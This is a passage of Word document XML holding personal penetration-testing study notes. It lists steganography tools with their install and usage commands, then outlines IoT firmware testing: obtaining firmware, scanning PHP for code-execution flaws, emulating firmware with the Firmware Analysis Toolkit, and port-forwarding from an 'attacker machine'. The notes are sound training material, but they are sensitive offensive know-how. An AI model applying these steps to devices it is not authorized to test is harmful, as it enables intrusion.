          <w:ilvl w:val="4"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE9309D" w14:textId="10EB0E2C" w:rsidR="002C2A3F" w:rsidRDefault="002C2A3F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>lib Folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B5ADE" w14:textId="57CB5F2D" w:rsidR="002C2A3F" w:rsidRDefault="002C2A3F" w:rsidP="002C2A3F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682EAC8F" w14:textId="5D66A017" w:rsidR="002C2A3F" w:rsidRDefault="00CF481F" w:rsidP="002C2A3F">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CC: Steganography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45187569" w14:textId="0917084A" w:rsidR="00CF481F" w:rsidRDefault="00CF481F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Steghide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A5B92D" w14:textId="0D032323" w:rsidR="00CF481F" w:rsidRDefault="00CF481F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>works only for jpgs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67B45B" w14:textId="7B96F7E4" w:rsidR="00CF481F" w:rsidRDefault="00CF481F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can encrypt data with passphrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B0D6D1" w14:textId="66A6B839" w:rsidR="00CF481F" w:rsidRDefault="00CF481F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install steghide</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F65F64" w14:textId="279C33E6" w:rsidR="00CF481F" w:rsidRDefault="00CF481F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>steghide</w:t>
      </w:r>
      <w:r w:rsidR="00DF5B0D">
        <w:t xml:space="preserve"> [embed/extract] [flags] [file]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7FB448" w14:textId="1AF26016" w:rsidR="00903FDF" w:rsidRDefault="00903FDF" w:rsidP="00903FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. steghide extract -sf &lt;filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75163521" w14:textId="4486CF58" w:rsidR="00DF5B0D" w:rsidRDefault="00DF5B0D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>zsteg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CD4EDF" w14:textId="03E7E2CF" w:rsidR="00DF5B0D" w:rsidRDefault="00DF5B0D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used for pngs and BMPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F4DEE3" w14:textId="0BC32EFD" w:rsidR="00DF5B0D" w:rsidRDefault="00DF5B0D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>gem install zsteg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE68BD" w14:textId="103222C1" w:rsidR="00DF5B0D" w:rsidRDefault="00DF5B0D" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>syntax. zsteg [file] [flags] [params]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C0C05" w14:textId="2245A21F" w:rsidR="00162F91" w:rsidRDefault="00162F91" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exiftool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64694086" w14:textId="237B000E" w:rsidR="00162F91" w:rsidRDefault="00162F91" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>view and edit image metadata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BDD94D" w14:textId="4863BE5B" w:rsidR="00162F91" w:rsidRDefault="00162F91" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sudo apt install exiftool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A7471" w14:textId="5D79334B" w:rsidR="00162F91" w:rsidRDefault="00162F91" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Stegoveritas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB1B192" w14:textId="4C32D767" w:rsidR="00162F91" w:rsidRDefault="00162F91" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>wide file support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557E586B" w14:textId="7FF75DCD" w:rsidR="00162F91" w:rsidRDefault="00162F91" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>pip3 install stegoveritas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD6771C" w14:textId="656A54DC" w:rsidR="00162F91" w:rsidRDefault="00162F91" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stegoveritas_install_deps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B465C5B" w14:textId="305DC8FF" w:rsidR="00162F91" w:rsidRDefault="00162F91" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>stegoveritas [options] file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F4AA8B" w14:textId="6EBB3672" w:rsidR="00162F91" w:rsidRDefault="002F61BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Spectrograms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F24ADED" w14:textId="3A399CDB" w:rsidR="002F61BD" w:rsidRDefault="002F61BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sonic Visualizer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F435C0B" w14:textId="46C24833" w:rsidR="002F61BD" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId171" w:history="1">
        <w:r w:rsidR="002F61BD" w:rsidRPr="00DF13D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.sonicvisualiser.org/download.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2BC27C70" w14:textId="276E72C8" w:rsidR="00903FDF" w:rsidRDefault="002F61BD" w:rsidP="00903FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>download, save, make it executable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BD353" w14:textId="5336195A" w:rsidR="002F61BD" w:rsidRDefault="002F61BD" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Layer &gt; Add Spectrogram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D778276" w14:textId="6A0717C8" w:rsidR="00903FDF" w:rsidRDefault="00903FDF" w:rsidP="00903FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>QR Codes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D285583" w14:textId="5F5CEC0E" w:rsidR="00903FDF" w:rsidRDefault="00903FDF" w:rsidP="00903FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>qtqr &lt;imagename&gt; in  Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD8BA8B" w14:textId="52CC443C" w:rsidR="00903FDF" w:rsidRDefault="00903FDF" w:rsidP="00903FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OutGuess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0162A4BE" w14:textId="44972BF1" w:rsidR="00903FDF" w:rsidRDefault="00903FDF" w:rsidP="00903FDF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>used to hide data</w:t>
      </w:r>
      <w:r w:rsidR="00125B24">
        <w:t xml:space="preserve"> in redundant content data bits of existing media files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767D9A82" w14:textId="059A9C4B" w:rsidR="00125B24" w:rsidRDefault="00125B24" w:rsidP="00125B24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. outguess -r &lt;filename&gt; &lt;output filename&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B0576" w14:textId="0AABDF18" w:rsidR="00010DC0" w:rsidRDefault="00010DC0" w:rsidP="00010DC0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F5AD5E" w14:textId="37779657" w:rsidR="00010DC0" w:rsidRDefault="00E449DA" w:rsidP="00010DC0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Intro to IoT Pentesting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CF680B" w14:textId="24ACF8EF" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Theory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD6A166" w14:textId="5227AE9A" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Firmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576221D6" w14:textId="30F44B7E" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Main ways of obtaining firmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2700E2DD" w14:textId="49871008" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>vendor website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7EEF7A" w14:textId="6F4618D9" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F342A26" w14:textId="0D121094" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>reversing mobile application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0912A76E" w14:textId="026B499A" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sniffing OTA update mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F35DA7" w14:textId="011B0167" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>device dumping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04118152" w14:textId="794E52FD" w:rsidR="00E449DA" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Examining Firmware </w:t>
      </w:r>
      <w:r w:rsidR="00E449DA">
        <w:t>Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C920823" w14:textId="6EABBEFA" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>binwalking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCA7CCC" w14:textId="4BBB34BD" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>go through directories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E307F5" w14:textId="6AA8D34C" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>www to find web application used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BF069D" w14:textId="26915155" w:rsidR="00E449DA" w:rsidRDefault="00E449DA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>analyze php files for vulns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9FFF9" w14:textId="4CD29D2F" w:rsidR="00E449DA" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Attacking Applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E4F5DB" w14:textId="0850AEA3" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>look for vulns in code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A486648" w14:textId="6D355BFB" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>blind code executions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33169828" w14:textId="208230E4" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Firmware Analysis Toolkit (FAT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9A5174" w14:textId="2890B7EF" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">based on </w:t>
      </w:r>
      <w:hyperlink r:id="rId172" w:history="1">
        <w:r w:rsidRPr="00DF13D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/firmadyne/firmadyne</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44F703EE" w14:textId="66DEAAC2" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>automated and scalable system for performing emulation and dynamic analysis of linux-based embedded firmware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0749C626" w14:textId="690C76D5" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>PostgreSQL DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E37B5BA" w14:textId="10EF7A26" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>copy firmware to toolkit folder and change owner of file to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2DC12C" w14:textId="6F3612CC" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. cp rootfs.squashfs firmware-analysis-toolkit/ ; cd firmware-analysis-toolkit/ ; chown root:root rootfs.squashfs ; ll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087BFCEC" w14:textId="23C5B531" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>run FAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C4D078" w14:textId="7B5299A7" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>./fat.py rootfs.squashfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADD92CE" w14:textId="12908A51" w:rsidR="00672D75" w:rsidRDefault="00672D75" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>IP is output, hit enter to continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E171081" w14:textId="32360A99" w:rsidR="00782330" w:rsidRDefault="00782330" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>create a port forward on attacker machine using ssh, victim ip, and ip output by FAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F341734" w14:textId="39D3D7CB" w:rsidR="00782330" w:rsidRDefault="00782330" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. ssh -N &lt;user&gt;@&lt;ip&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00910BF2">
        <w:t xml:space="preserve"> -L 8081:&lt;ip&gt;:80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0A6A8E" w14:textId="261C4AB9" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter password for user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266B67A3" w14:textId="3EE2BC87" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId173" w:history="1">
        <w:r w:rsidRPr="00DF13D8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://localhost:8081</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="465A4818" w14:textId="53700301" w:rsidR="00910BF2" w:rsidRDefault="00910BF2" w:rsidP="007F0512">
      <w:pPr>
